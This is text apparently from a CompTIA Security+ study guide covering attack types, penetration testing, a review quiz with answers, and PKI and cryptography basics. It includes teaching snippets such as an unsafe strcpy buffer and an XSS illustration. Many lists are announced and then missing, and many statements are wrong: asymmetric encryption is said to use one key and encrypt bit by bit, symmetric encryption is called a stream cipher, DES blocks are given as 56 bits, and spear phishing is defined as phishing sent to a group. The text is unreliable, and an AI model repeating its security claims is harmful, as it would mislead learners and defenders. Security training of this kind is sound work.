Allowing a fireman into your server room is a social engineering urgency attack.

Common attacks

If you are going to gain the CompTIA Security+ qualification, you need to know the different types of attacks that you may encounter; there are numerous attacks and you need to know each of these, their characteristics, and how they can be prevented. Let's look at each of these in turn.

Application/service attacks

A SYN flood attack is where only the first two parts of the three-way handshake have taken place, leaving your computer is a state of limbo. DDoS has a high volume of these.


Figure 4: DDOS attack


Figure 5: Man-in-the-middle

For example, a hacker is imitating the conversations of both parties for gaining access to funds. The attacker intercepts a public key and with this he can put in his own credentials to trick the people on both sides into believing that they are talking to each other in a secure environment. While online shopping from home or a mobile device, the victims think that they are buying goods from a legitimate source but instead their money is being stolen.

Exam tip:Kerberos prevents replay attacks as it uses updated sequence numbers and time stamps.

A POODLE attack is a MIM downgrade attack using SSL 3.0 in CBC mode.


Figure 6: Zero day exploit

The only way to detect a zero day exploit is when you have taken a baseline of your computer previously, then you can check the changes since the baseline; this will identify a zero day exploit. If you have no previous baseline, then you will not detect it.

A zero day virus cannot be traced or discovered by any security device as it may take up to five days before a patch or update is released.


Figure 7: DNS poisoning

If we look at Figure 7, Computer A has already been to the legitimate website called Web 1, and its proper IP address of 1.1.1.1 has been placed in its DNS cache. When DNS resolution is performed, the DNS cache is searched first then the hosts file is next, followed by the internal DNS server. The attacker has now deleted the entry for Web 1 and inserted his entry for Web 1 with an IP address of 2.2.2.2. Now, when the user enters the URL www.web1.com, the only entry in the DNS cache is Web1 2.2.2.2 and the user is diverted to a website that looks like the legitimate website. When he enters his card details to make a purchase, his account is emptied.

Programming attacks

Programming attacks are when we use scripts or overload the expected characters or integers expected. Let's look at these in turn:

Exam tip:
In a Christmas tree attack, the URG, PUSH, and FIN flags are all set to 1, meaning that they are open. As URG is set to 1, it says that this packet has a high priority over other traffic.

print "<html>"

print "Latest comment:"

print database.latestComment

print "</html>"

<html>

Latest comment:

<script> (Javascript code is placed here) </script>

</html>

Example 1—JavaScript—creating a money variable

JavaScript can use the command var that means variable; an example would be to set a variable for money then allocate it a value of 300.00. You can see we use var for the variable and then use money as its label. In the next row, we use the money variable and give it a value of 300.00:

<script type="text/javascript">
<!——
var money;
money = 300.00;
//-->
</script>

Example 2—Javascript—setting the day of the month

We will use Javascript to set the day of the month; you will notice the Javascript code between the html tags <script> to start the script and <\script> to end the script. The command var is very common in Javascript:

<!DOCTYPE html>
<html>
<body>
<p>Click the button to display the date after changing the day of the month. </p>
<button onclick="myFunction()">Try it</button>
<p id="demo"></p>
<script>

function myFunction() {
var d = new Date();
d.setDate (15);
document.getElementById("demo").innerHTML = d;
}
</script>
</body>
</html>

A XSS attack can be identified by looking for the command var and for a variable with the html tags <script> and </script>. Scripts with var are likely to be Javascript. It is a very popular exam topic:


Figure 8: Buffer overflow

In the example here, we are going to set up a buffer to be a maximum of 64 characters, then we are going to use strcpy to copy strings of data. A string of data is used to represent a number of text characters. The problem that arises is that strcpy cannot limit the size of characters being copied. In the example here, if the string of data is larger than 64 characters, then a buffer overflow will occur:

int fun (char data [256]) {
int i
char tmp [64];
strcpy (tmp, data);
}

Exam tip:Strcpy could create a buffer overflow as it cannot limit the size of the characters.

Hijacking related attacks

In this section, we will look at attacks where he hacker hijacks either a device, cookie, or a piece of software. Let's look at these in turn:

Input validation could prevent SQL injection, buffer overflow, and integer overflow attacks.

A stored procedure could prevent a SQL injection attack as it is a pre-written script that is executed and cannot be altered when executed.

Driver manipulation

Device drivers allow an operating system such as Windows to talk to hardware devices such as printers. Sophisticated attackers may dive deep into the device drivers and manipulate them so that they undermine security on your computer. They could also take control of the audio and video of the computer, they could stop your anti-virus software from running, or your data could be exposed to someone else. There are two main techniques for driver manipulating, and these are as follows:

Cryptographic attacks

There are a variety of cryptographic attacks, and we will now look at these in turn; you need to know these thoroughly for the Security+ exam. We will start with the birthday attack and finish with key stretching:

Password attacks

The two most common password attacks are the dictionary attack and the brute force attack; let's look at these in turn:

Which of the following passwords will a dictionary attack crack?

It will crack elasticity and blueberry, but el@STcity is not spelt properly and has numbers and characters not in a dictionary, therefore it will fail. It was also not crack fred123 as it ends in numbers; a dictionary contains only letters.

Which of the following passwords will a brute force attack crack?

It will crack them all—eventually.

Account lockout with a low value will prevent a brute force attack.

These make it very easy to guess them using a password cracker. Password is the most common password to be used. The following list shows the most common passwords over the years:

Wireless attacks

Over the past few years, the use of wireless in our daily lives and in the office has increased to an extent that if I am booking a hotel room and there is no wireless, then I look for another hotel. As you travel on the railways to and from work, the rail company provides complimentary Wi-Fi. Let's look at the types of wireless attacks:


Figure 9: Evil twin

The diagram in Figure 9 will help explain an evil twin wireless access point. The victim has gone to a coffee shop to purchase some coffee; the shop is providing Wi-Fi free of charge, the SSID is hidden, and the WAP password is included on the receipt. However, when the customer sits down at the table to hook up his tablet, he finds an SSID also called CAFÉ; he then thinks that this is the Wi-Fi that he has the details for and he clicks to join the network, but instead of requiring him to put in a Wi-Fi password, it is set to open system authentication, so it connects him immediately. He then thinks to himself what was the purpose of printing the Wi-Fi details on the receipt? He can connect automatically and he is unaware he has just joined an evil twin network where all of his data will be intercepted by a wireless packet sniffer. The legitimate WAP will not appear as the SSID is hidden.

Implementing a 802.1x managed switch prevents rogue WAPs from accessing your network as the AP needs to be authenticated first.

Exam tip:
A wireless jamming attack uses interference to make the attack.

Penetration testing

A penetration test is an intrusive test where a third party has been authorized to carry out an attack on a company's network. Rules have been agreed on, so they just need to identify the weaknesses, should it be exploited as far as it can go.

Penetration testing is commonly known as a pen test. The pen testers are given different amounts of information:

For example, a pen tester is about to carry out a pen test but has not been given any information on the system. As he arrives at the company, the IT manager offers him a cup of coffee and then give him the local admin account of Server 1. What type of pen test is this? It is a gray box as he has been give some information, even if it is late.

Penetration testing techniques

Let's now look at the type of techniques that a pen tester may adopt:

Listening is passive reconnaissance. Password reset is active reconnaissance.

Vulnerability scanning concepts

A vulnerability scanner is a passive scanner that identifies vulnerabilities or weaknesses on the system. For example, there could be missing updates for the operating system, anti-virus solutions, or there could be only one administrator account on the system. Microsoft has a vulnerability scanning tool called the Microsoft Baseline Security Analyzer (MBSA). A zero day exploit cannot be traced by a vulnerability scanner; it has not yet been identified and has no updates or patches available.

Let's look at the type of output a vulnerability scanner could produce:

A pivot is gaining access to one computer so that an attack can be launched on another computer.

Credentialed versus non-credentialed scans

There are two types of scans, credentialed and non-credentialed. Let's look at these in turn:

Exam tip:A credentialed scan can produce more information and can audit.
A non—credentialed scan is primitive and can only find missing patches or updates.

Penetration testing versus vulnerability scanning

The penetration test is more intrusive as it is trying to fully exploit the vulnerabilities that it finds; it could cause damage to the IT systems, whereas the vulnerability scanner is non-intrusive as it scans for vulnerabilities. Even the credentialed scan is only scanning the registry/permissions and finding missing matches—it is informational and does not exploit the system, and therefore, is less likely to cause damage to the systems.

Practical exercise—running a vulnerability scanner

In this exercise, we are going to download the Microsoft Baseline Analyzer Tool and run it against your local computer to look for vulnerabilities:

  1. Go to Google and search for and download Microsoft's Baseline Analyzer tool. You can also just enter MBSA and it will find it.

  2. Click on MBSASetup-x64-EN. The MBSA Setup wizard appears. Press Next:


Figure 10

  1. Click on I accept the license agreement, then press Next:


Figure 11

  1. On the destination folder page, press Next.

  2. On the start installation page, press Install, then the installation progress page will appear:


Figure 12: Installation progress

  1. Then, the setup will finish:


Figure 13: Installation complete

  1. A shortcut is placed on the desktop. Double-click it. The UAC prompt appears; press Yes:


Figure 14: MBSA shortcut

  1. The MBSA Management console appears; press Scan a Computer, and then at the bottom right, press Start Scan:


Figure 15: MBSA management console

  1. The scan starts and it downloads security update information from Microsoft. As it is going to compare the computer updates against the latest updates for Windows 10, this will take about 10-15 minutes:


Figure 16: Obtaining security updates from Microsoft

  1. The scan results page comes up; you will notice that the default is Score (worst first). Scroll down:


Figure 17

  1. You can see that the MBSA is a vulnerability scanner that would be used as a credentialed scan and that it produces some good results, but it is passive and informational, and did not try to exploit the computer at all:


Figure 18: Credentialed vulnerability scan

You will now notice if you have any vulnerabilities on your computer. There are hyperlinks below each item listed, giving you information on how to update your vulnerabilities. Look at each of these in turn and take the appropriate actions.

Review questions

  1. If I install a freeware program that analyses my computer and then it finds 40,000 exploits and asks me to purchase the full version, what type of attack is this?

  2. What is crypto-malware?

  3. What type of virus replicates itself and uses either ports 4444 or 5000?

  4. What type of virus inserts a .dll into either the SysWOW64 or System 32 folder?

  5. What is a RAT?

  6. What type of virus attacks the windows/system 32 folder on Windows, or the bin/ and /usr/bin/ on Linux

  7. How does a logic bomb virus work?

  8. What is the purpose of a keylogger?

  9. What is a botnet?

  10. Explain a phishing attack.

  11. How does spear phishing differ from a phishing attack?

  12. What is a whaling attack?

  13. What type of attack it is if I leave a voicemail?

  14. What is social engineering tailgating?

  15. What is social engineering?

  16. What type of attack is it if I dress as a policeman?

  17. What type of attack is it if a fireman arrives and you let him into the server room to put out a fire?

  18. What type of attack is it if I am in an ATM queue and someone has his phone to one side so that he can film the transaction?

  19. What type of attack is distributing fake software?

  20. What is a watering hole attack?

  21. What type of attack is it if I receive an email from the CEO telling me to complete the form below by clicking on a link in the email?

  22. One of the bosses asks me to give him the information of one of my peers gave him last week. I am not too sure, but I give him the information; what type of attack is this?

  23. What type of attack is a multiple Syn flood attack on a well-known website that takes it down?

  24. Explain a man-in-the middle attack.

  1. How does a replay attack differ from a man-in-the-middle?

  2. What type of attack is a man-in-the-middle attack using a SSL3.0 browser that uses a Chain Block Cipher (CBC)?

  3. What type of attack is a man-in-the-browser attack?

  4. How can I prevent a replay attack in a Microsoft environment?

  5. How can I prevent a pass the hash attack?

  6. What type of attack uses HTML tags with JavaScript?

  7. What type of exploit has no patches and cannot be detected by the NIDS or NIPS?

  8. What is domain hijacking?

  9. What is blue jacking?

  10. What is Bluesnarfing? 

  11. What type of attack does the attacker need to be local and how can I prevent that attack?

  12. For what type of attack do I use the tool strcpy for?

  13. What is an integer overflow attack?

  14. What type of attack uses the phrase 1=1?

  15. Name two methods to prevent the attack in question 36.

  16. What type of attack is session hijacking?

  17. If I misspell a website but still get there, what type of attack is this?

  18. What type of attack would I use shimming or refactoring for?

  19. What type of attack is susceptible to a birthday attack?

  20. What are rainbow tables?

  21. How can I store passwords to prevent a dictionary attack?

  22. Name two tools that can be used for key stretching.

  23. What is the fast password attack that can crack any password?

  24. What is the only way to prevent a brute force attack?

  25. What can we do to slow down a brute force attack?

  26. What type of authentication is the most prone to errors?

  27. What is an evil twin?

  28. How can I prevent an attack by a rogue WAP?

  29. I am trying to use the internet but my wireless session keeps crashing—what type of attack is this?

  30. How close does an attacker need to be for an NFC attack?

  31. If I have no information on the system but at the last minute the IT manager gives me the local admin account, what type of penetration test is this?

  32. How much information does a black box pen tester have?

  33. How much information does a white box pen tester have?

  34. Which type of vulnerability scan can I use for auditing?

  35. If I carry out a non-credentialed vulnerability scan, what will I find?

  36. What type of reconnaissance is it if I try and obtain a password reset?

  37. What type of reconnaissance is it if I actively listen?

  38. What is a pivot?

Answers and explanations

  1. Because you have parted with money, this is a subtle form of ransomware.

  2. An example of crypto-malware is ransomware where the victim's hard drive is encrypted and held to ransom.

  3. A worm replicates itself and can use either ports 4444 or 5000.

  4. A Trojan inserts a .dll into either the SysWOW64 or System 32 folder.

  5. A remote access Trojan is a Trojan that sends the user's username and password to an external source so that they can create a remote session.

  6. A rootkit virus attacks the root in windows it is the /system 32 folder or in Linux it is the /usr/bin/ directory.

  7. A logic bomb virus is triggered off by an event; for example, the Fourth of July logic bomb would activate when the date on the computer was July 4.

  8. A keylogger is a piece of software that could run from a USB flash drive plugged into the back of a computer it then records all of the keystrokes being used. It can capture sensitive data that is being typed in such as bank account details and passwords.

  9. A botnet is a group of computers that have been infected so that they can be used to carry out malicious acts with the real attacker being identified. They could be used for a DDoS attack.

  10. A phishing attack is when a user receives an email asking him to fill in a form requesting his bank details.

  11. Spear phishing is a phishing attack that has been sent to a group of users.

  12. A whaling attack targets the CEO or a high-level executive in a company.

  13. A vishing attack can use a telephone or leave a voicemail.

  14. Social engineering tailgating is where someone has used a smart card or entered a pin to access a door then someone behind them enters the door before it closes and they enter no credentials.

  15. Social engineering exploits an individual's character in a situation that they are not used to.

  16. If I dress as a policeman it could be an impersonation attack.

  17. If I let fireman into the server room to put out a fire that is a social engineering urgency attack.

  18. I am using an ATM queue and someone films the transaction this is a subtle shoulder surfing attack.

  19. Fake software that will not install is a hoax. An email alert telling you to delete a system file as it is a virus is also a hoax.

  1. A watering hole attack infects a website that a certain group of people visit regularly.

  2. An email that looks like it has come from the CEO telling you to carry out an action is a social engineering authority attack.

  3. This is a social engineering consensus attack where the person being attacked wants to be accepted by their peers.

  4. An attack with multiple Syn flood attacks is a DDoS attack.

  5. A man-in-the middle attack is where a connection between hosts has been intercepted, replaying and changing the conversation, but the people still believe that they are talking directly to each other.

  6. A reply attack is similar to a man-in-the-middle attack, except the intercepted packet is replayed at a later date.

  7. A POODLE attack is a man-in-the-middle attack using an SSL3.0 browser that uses Chain Block Cipher (CBC).

  8. A man-in-the-browser attack is a Trojan that intercepts your session between your browser and the internet; it aims at obtaining financial transactions.

  9. Kerberos authentication uses USN and time stamps and can prevent a replay attack, as the USN packets need to be sequential and the time stamps need to be in order.

  10. Disabling NTLM will prevent a pass the hash attack.

  11. XSS uses HTML tags with JavaScript.

  12. A zero day virus has no patches and cannot be detected by the NIDS or NIPS as it may take the anti-virus vendor up to five days to release a patch.

  13. Domain hijacking is where someone tries to register your domain, access your hosted control panel, and set up a website that is similar to yours.

  14. Bluejacking is hijacking someone's Bluetooth phone so that you can take control of it and send text messages.

  15. Bluesnarfing is where you steal someone's contacts from their Bluetooth phone.

  16. An ARP attack is a local attack that can be prevented by using IP Sec.

  17. Strcpy can be used for a buffer overflow attack.

  18. An integer overflow inserts a number larger than what is allowed.

  19. An attack that uses the phrase 1=1 is an SQL injection attack.

  20. Input Validation and Stored Procedures can prevent an SQL injection attack.

  21. Session hijacking is where your cookies are stolen so someone can pretend to be you.

  22. Typosquatting is where an attack launches a website with a similar name to the legitimate website in the hope that victims misspell the URL.

  1. Shimming or refactoring are used for a driver manipulation attack.

  2. Digital signatures are susceptible to a birthday attack.

  3. Rainbow tables are a pre-computed list of passwords with the relevant hash in either MD5 or SHA1.

  4. If I salt passwords it will insert a random value and prevent dictionary attacks as a dictionary does not contain random characters.

  5. Two tools that can be used for key stretching are bcrypt and PBKDF2.

  6. Brute forces is the fastest password attack that crack any password as it uses all combinations of characters, letters, and symbols.

  7. An account locked with a low value is the only way to prevent a brute force attack.

  8. If account lockout is not available the best way to slow down a brute force attack is making the password length longer or to salt the passwords.

  9. Using passwords for authentication is more likely prone to errors as certificates and smart cards don't tend to have many errors.

  10. An evil twin is a WAP that is made to look like a legitimate WAP.

  11. Using an 802.1x authentication switch can prevent an attack by a rogue WAP as the device needs to authenticate itself to attach to the switch.

  12. A wireless disassociation attack is where the attacker prevents the victim from connecting to the WAP.

  13. An attacker need to be within 4 cm of my card to launch an NFC attack.

  14. This is a gray box pen test; although it says he has no information that would make it black box, at the last minute he is given a password, making it gray box. He is given some information.

  15. A black box pen tester has no information.

  16. A white box pen tester has all of the information.

  17. A credentialed vulnerability scan can be used for auditing.

  18. A non-credentialed vulnerability scan can only see missing patches of the systems on your network

  19. Active reconnaissance is where I try to obtain a password reset.

  20. Listening is a passive reconnaissance technique; active listening means that you are concentrating on what is being said, and you are not taking any action.

  21. A pivot is where you gain access to a network so that you can launch an attack on a secondary system.

Implementing Public Key Infrastructure

Certificates are used for both encryption and authentication, and in this chapter, we are going to look at different encryption types and how certificates are issued and used. This is the most difficult module for students to understand, so we have focused on making the most difficult aspects seem easy. If you are going to be successful in the Security+ exam, you must know this module thoroughly. We will start with the Public Key Infrastructure (PKI), both the public and private keys. It is an asymmetric form of encryption.

We will cover the following exam objectives in this chapter:

Public key infrastructure concepts

The public key infrastructure provides asymmetric techniques using two keys: a public key and a private key. There is a certificate hierarchy, which is called the certificate authority, that manages, signs, issues, validates, and revokes certificates. Let's first look at the components of the certificate hierarchy. A certificate is known as an X509 certificate.

Certificate hierarchy

The Certificate Authority (CA) is the ultimate authority as it holds the master key, also known as the root key, to sign all of the certificates that it gives the Intermediary, which then in turn issues to the requester:


Figure 1: Certificate hierarchy

Exam tip:
For Business-to-Business (B2B) transactions and working with other commercial companies, your X509 certificates need to come from a public CA.

There are different types of CA:

If you wish to trade and exchange certificates with other businesses, you need to get your certificate from a public CA. The certificate that follows has been issued to the Bank of Scotland from a public CA called DigiCert Global CA; you can see on the front of the certificate the purpose for use and also the dates that it is valid for. The X509 has an Object Identified (OID) that is basically the certificate's serial number—the same way that paper money has serial numbers:


Figure 2: Public CA issued certificate

Exam tip:
Certificate pinning prevents CA compromise and the issuing of fraudulent certificates.

Certificate trust

Certificates have some form of trust where the certificate can check whether or not it is valid. We are going to look at different trust models; you need to ensure that you know when each is used:

Exam tip:
When two separate CAs trust each other, they will use a trust model called the bridge of trust.

Exam tip:
A bridge trust model is used so that two separate CAs can work with each other.

Certificate validity

Each time a certificate, is used the first thing that must happen is that it must be checked for validity; there are three separate processes that you must know thoroughly, and these are as follows:


Figure 3: Certificate validity

The validation of a certificate is done by the CRL unless it is going slow—then it will be the OCSP doing this.

Certificate management concepts

We are now going to look at the different ways certificates are managed in a PKI environment, starting with the request for a new certificate and ending with different certificate formats. You must learn all of this information thoroughly as these aspects are heavily tested:


Figure 4: Key escrow

The key escrow stores private keys for third parties.

A web server will use certificate stapling to bypass the CRL and use the OCSP for faster certificate validity. This is also known as OCSP stapling.

Certificate type

Format

File extension

Private

P12

.pfx

Public

P7B

.cer

PEM

Base 64 format

.pem

DER

Extension for PEM

.der

The certificate equivalent of a serial number is the OID that is located on the X509 itself.

Certificate types

As a security professional, you will be responsible for purchasing new certificates, and therefore you must learn the certificates types thoroughly to ensure that you make the correct purchase. We will start with the self-signed certificate that can roll out with applications like Exchange Server or the Skype server and finish with extended validation where the certificate has a higher level of trust:

PEM uses a Base64 certificate.

A wildcard certificate can be used on several servers in the same domain. A SAN certificate can be used on servers in different domains.


Figure 5: Extended validation

Asymmetric and symmetric encryption

There are two main types of encryption that use certificates, and these are asymmetric and symmetric; we need to learn about each thoroughly. Let us start by explaining what encryption is; please remember you are taking plain text, and changing it into ciphertext.

Encryption explained

Encryption is where we take plaintext that can be easily read and convert it into ciphertext that cannot be read. For example, if we take the word pass in plain text, it may then be converted to UDVV; this way, it is difficult to understand:

Letter

A

B

C

D

E

F

G

H

I

J

K

L

M

ROT 13

N

O

P

Q

R

S

T

U

V

W

X

Y

Z


Letter

N

O

P

Q

R

S

T

U

V

W

X

Y

Z

ROT 13

A

B

C

D

E

F

G

H

I

J

K

L

M

When receiving the message—GVZR SBE GRN—then we would apply the ROT 13, but instead of going forward 13 places to decipher we would simply go back 13 places and the message would now be TIME FOR TEA.

Exam tip:
Encryption is taking plaintext and changing it into ciphertext so that it cannot be read.

There are two types of encryption that use certificates and these are asymmetric and symmetric; let us look at each of these in turn:

The first stage in encryption is the key exchange; you will always keep your private key and give away your Public Key. You will always use someone else's public key to encrypt:


Figure 6: Asymmetric key exchange

In the preceding diagram, there are two different key pairs: the black key pair and the white key pair. These work together. If you think of the private key as being your bank card, you will never give it away, but the Public Key is your deposit slip—you will give it away so that people can pay money into your account.

The person who is sending the data is on the From side and the person receiving the data is on the To side.

The way to remember the labels are on the left-hand side is South-East and on the right-hand side is distinguished-visitor. These labels stand for:

For example, Bob wants to encrypt data and send it to Carol; how is this done? Let us look at the following diagram. We can see that Bob owns the black key pair and Carol owns the white key pair. The first thing that needs to happen before encryption can happen is that they give the other person their public key:


Figure 7: Bob encrypting data

You can see the under the column for Bob that he has his private key, which he will always keep, and the public key that Carol has given him. In the preceding diagram, you can see the label E for encryption, and therefore Bob uses Carol's public key to encrypt the data. Then, under Carol, you can see the letter D for decryption; and therefore, when the encrypted data arrives, Carol uses the other half of the white key pair, the private key, to decrypt the data.

Exam tip:
Encryption stops the data being read by changing plaintext to ciphertext. A digital signature ensures that the data has not been altered as it creates a hash of the message, but the original data can be read.

Digital signature explained

When we send an email or document to someone, it could be intercepted in transit and altered. Your email address could be spoofed and someone could send an email as if it was from you, but there is no guarantee of integrity. Do you remember in Chapter 1, Understanding Security Fundamentals, that we used hashing to provide the integrity of data, however, in emails we use a Digital Signature? We sign the email or document with our private key and it is validated by our public key.

The first stage in digital signatures is to exchange public keys—the same principle as encryption.

For example, George wants to send Mary an email and he wants to ensure that it has not been altered in transit. See the following diagram:


Figure 8: Digital signature

In the preceding diagram, you can see that George is going to sign the email with his private key when he sends it to Mary; she validates it with the Public Key that George has already given to her. When the email has been validated, she knows that the email has not been tampered with.

When people are asked to sign contracts, they sometimes use a third-party provider that asks them to digitally sign the contract; this then makes the contract valid as the digital signature proves the identity of the signatory.

Non-repudiation: When I complete a digital signature, I am using my private key that I should never give away to sign the email or document, proving that it has come has come from me. Non-repudiation means that I cannot deny that it was me who signed the document. I could not say it was done by someone else. In the early sixth century, King Arthur would send messages to his knights on a parchment scroll and then would put his wax seal on the scroll to prove it came from him. The digital signature in modern life is doing the same—it is proving who it came from. The Digital Signature creates a one-way hash of the entire document, so it also provides integrity similar to hashing.

Exam tip:
I will always use someone else's public key to encrypt data. I will never give my private key away. It is like giving away my bank card; it will never happen.

Cryptography algorithms and their characteristics

If we look at symmetric and asymmetric keys, they use a cipher that has a number of bits attached to it—the lower the number, the faster and the higher the bits. The slower, however the one with the higher number of bit is stronger.

For example, we have two people who are going to complete a challenge—they are Usain Bolt, who is DES, a 56-bit key, and we have King Arthur wearing armor, who has an RSA of 4,096 bits. The first part of the challenge is a 100-meter dash and when Usain Bolt wins, King Arthur is held back by the weight of his armor and he is 90 meters behind. The second part of the challenge is a boxing match, and Usain keeps hitting King Arthur who keeps laughing at him as he is being protected by his armor. Then, out of the blue, King Arthur lands a knockout blow to Usain. Since the challenge was for charity and the result was a draw, they are both happy.

Concept:
The smaller the key, the faster it is, but it is more insecure. The higher the key, the slower it is, but it is more secure.

Symmetric algorithms

For the Security+ exam, you must know the characteristics of each of the symmetric algorithms, from when it is used to its key length. Remember, they will never ask you which key encrypts or decrypts, as the answer would always be the private key, also known as the shared key. Let us look at each of these in turn:

Asymmetric algorithms

Asymmetric algorithms use a PKI environment as they use two keys: a private key that is always kept and a Public key that is always given away. Let us now look at different asymmetric techniques:


Figure 9: Diffie Hellman

Diffie Hellman creates the keys used in the Internet Key Exchange (IKE); it uses UDP Port 500 to set up the secure session for the L2TP/IPSec VPN. Once the secure tunnel has been created, then the symmetric encrypted data flows down the tunnel.

Symmetric versus asymmetric analogy

If we think of encryption as playing table tennis where each person has just one bat and the pace is extremely fast, this is similar to asymmetric encryption as it uses one key.

Then, if we change the game and we give the players two bats, the first bat to stop the ball and then they must switch bats to return the ball, this would be much slower.

The same can be said for encryption; asymmetric is much more secure as it has two keys and uses Diffie Hellman, an asymmetric technique to set up a secure tunnel for the symmetric data. Symmetric encryption uses a block cipher where it encrypts large blocks of data much faster than the asymmetric technique.

XOR encryption

The binary operation exclusive OR (XOR) is a binary operand from Boole algebra. This operand will compare two bits and will produce one bit in return:

This is the opposite to binary. For example, we are going to use the word tread in ASCII format and then we are going to insert a key using the word hello so that we can complete an XOR operation. See the following diagram:


Figure 10: XOR

XOR encryption is commonly used with AES, several symmetric ciphers, and a one-time pad.

Key stretching algorithms

The concept of key stretching is to insert a random set of characters to increase the size of the password hash, making it harder for a brute force attack:

Cipher modes

There are different cipher modes; most symmetric keys use a block cipher and can encrypt a large amount of data quicker than asymmetric encryption. Let us look at these in turn:

Stream versus block cipher analogy

We have two teams of four people who have been tasked with unloading one five-ton lorry full of skittles and placing them in a room on the bottom floor of a building.

There are skittles in boxes and there are skittles which have been placed loose. One of the teams has loose skittles that need to be bagged and the other lorry has boxes of skittles. It is obvious that the team with boxes of skittles will win:


Figure 11: Cipher Block Chaining (CBC)

The next block of plaintext is XOR'd against the last encrypted block before you encrypt this block. When decrypting a ciphertext block, you need the XOR from the previous ciphertext block. If you are missing any blocks, then decryption cannot be done.

Hashing and data integrity

Hashing is where the data inside a document is hashed using an algorithm such as a Secure Hash Algorithm version 1 (SHA1) and MD5. This turns the data inside the file into a long text string known as a hash value; this is also known as a message digest.

While you are hashing the same data, if you copy a file and therefore have two files containing the same data, if you hash them with the same hashing algorithm, it will always produce the same hash value. Please look at the following example:

Can you read data that has been hashed? Hashing does not hide the data, as a digitally signed email could still be read; it only verifies integrity. If you wish to stop someone reading the email in transit, you need to encrypt it.

Comparing and contrasting basic concepts of cryptography

The most common asymmetric algorithms include the Diffie Hellman, which creates a secure session so that symmetric data can flow securely. An example of this would be the L2TP/IPsec VPN. RSA is the commonly used asymmetric algorithm that was the very first of its kind, creating public and private key pairs. Elliptic Curve Cryptography is an asymmetric algorithm used for the encryption of small mobile devices.

Asymmetric – PKI

Asymmetric keys are obtained from a CA. If you are selling products or services with external entities, then you need to obtain your X509s from a public CA, otherwise your internal certificates will not be accepted.

Asymmetric – weak/depreciated algorithms

A SSL should now be depreciated as it is weak; an example of an exploit is the POODLE attack, which is a man-in-the-middle attack that exploits the vulnerabilities of SSL 3.0 and SSL 3.0 (CBC). Asymmetric algorithms should not be using a key whose strength is 2046 or lower. However, a SSL VPN is the only VPN that uses a SSL certificate and works with legacy clients.

Asymmetric – ephemeral keys

Ephemeral keys are short-lived keys that are used for a one-time only session. There are two types of Diffie Hellman: Ephemeral (DHE) and Elliptic Curve Diffie Hellman Ephemeral (ECDHE). The other keys, used for other asymmetric and symmetric encryption, are known as static keys, as they have about a two-year lifespan.

Symmetric algorithm – modes of operation

Symmetric encryption is a stream cipher that encrypts data one bit at a time; this is easy to crack and is much slower than a block cipher. Block cipher mode takes blocks of data depending on the key and encrypts that data in blocks—this makes the encryption of a large amount of data much faster.

In a L2TP/IPSec VPN tunnel, we have a choice of three different versions of symmetric encryption; the weakest is DES, which has 56-bit key, followed by Triple Des (3DES), which has a 168-bit key. The most secure is AES as it can go from 128 bits up to 256 bits. Remember, symmetric encryption has only one key. It is much faster for encrypting a larger amount of data, but it needs Diffie Hellman, an asymmetric technique, to create a secure tunnel before it is used.

Symmetric encryption – stream versus block cipher

Symmetric encryption uses a block cipher, where blocks of data are encrypted. The key size determines how large the block of data is; for example, if I use DES, then I can only encrypt blocks of 56 bits, whereas AES can encrypt blocks of data of up to 256 bits.

Asymmetric encryption encrypts one bit at a time, therefore it is slower but more secure than symmetric encryption as it uses a larger key size and uses two keys: public and private.

Symmetric encryption – confusion

Confusion massively changes the input to the output by putting it through a non-linear table created by the key.

Symmetric encryption – secret algorithm

A secret key is the piece of information that is used to encrypt and decrypt messages in symmetric encryption.

Symmetric – session keys

A session key is an encryption and decryption key that is randomly generated to ensure the security of a communications session between a user and another computer or between two computers. A RADIUS server could create a session key for a user being authenticated.

Hashing algorithms

A hashing algorithm takes the data from a document and generates a hexadecimal value from that input. If you take the same data and hash it with the same algorithm it will generate the same hash. In the Security + exam, the hashing algorithms are SHA-1, which is 160 bits, and MD5, which is 128 bits. Hashing is a one-way function to ensure that the integrity of the data is intact.

Crypto service provider

A crypto service provider is a software library. For example, Microsoft uses the CryptoAPI and has providers such as:

Crypto module

A Crypto module is a combination of hardware or software that implements crypto functions such as digital signatures, encryption, random number generation, or decryption.

Protecting data

One of the key functions of a security team is to protect a company's data as it is difficult to put a cost value on lost data. Let us look at three types of data—when it is at rest, in use, and in transit:

Basic cryptographic terminology

The Security+ exam is full of cryptographic terminology, and in this section, we are going to look at these, starting with obfuscation, which makes the code obscure. Try asking your family and friends to say the word obfuscation and watch them struggle. It is aptly named as the word itself is very obscure! You must know the terminology thoroughly.

Obfuscation

Obfuscation is the process where you take source code and make it look obscure so that if it was stolen it would not be understood.

Pseudo random number generator

Pseudo Random Number Generator (PRNG) refers to an algorithm that uses mathematical formulas to produce sequences of random numbers. Random numbers can be used when generating data encryption keys.

Nonce

A nonce is an arbitrary number that can be used just once; it is often a random (https://en.wikipedia.org/wiki/Randomness) or pseudo-random (https://en.wikipedia.org/wiki/Pseudorandomness) number issued in an authentication protocol (https://en.wikipedia.org/wiki/Authentication_protocol) to ensure that old communications cannot be reused in replay attacks (https://en.wikipedia.org/wiki/Replay_attack).

Perfect forward secrecy

When a VPN makes a secure connection, a key exchange is made for each secure session, but it links to the server's private key. With perfect forward secrecy, there is no link between the session key and the server's private key, therefore even if the VPN server has been compromised, the attacker cannot use the server's private key to decrypt the session.

Security through obscurity

The concept of security through obscurity is to prevent anyone from outside the organization from knowing the architecture or design of the system or any of its components. The internal people are aware of the weaknesses of the system, but you want to prevent an outside person from knowing anything about the system. Obfuscation is a technique that makes the storing of source code unreadable.

Collision

If you hash the same data or password with MD5 or with SHA-1, then it will always create the same hash. Hashes are used to store passwords or digitally sign documents. A collision attack is where the attacker tries to match the hash; if the hash is matched, it is known as a collision, and this could compromise systems.

Steganography

Steganography is where a document, an image, an audio file, or a video file can be hidden inside another document, an image, an audio file, or a video file.

Diffusion

Diffusion is a technique where if you change one character of the input, it will change multiple bits of the output.

Implementation versus algorithm

In today's world, the security administrators need to look at how the company operates to ensure it is more secure. Do they want to implement smart cards for multifactor authentication or implement a VPN so that remote users can connect to the company securely? Do they need to implement a Data Loss Prevention (DLP) template to ensure that sensitive data cannot be emailed from the company?

Once the company vision has been decided, the security team then needs to look at the algorithms that they need. Normally, this would be the strongest possible, however, we need to ensure that the server has enough processing power to deal with any increase in key length. We should not be using a key of less that 2,046 bits as it would be too insecure.

Common use cases for cryptography

The words use case in the Security+ exam just mean examples of when something is used. We are now going to look at examples of when different cryptography is used.

Supporting confidentiality

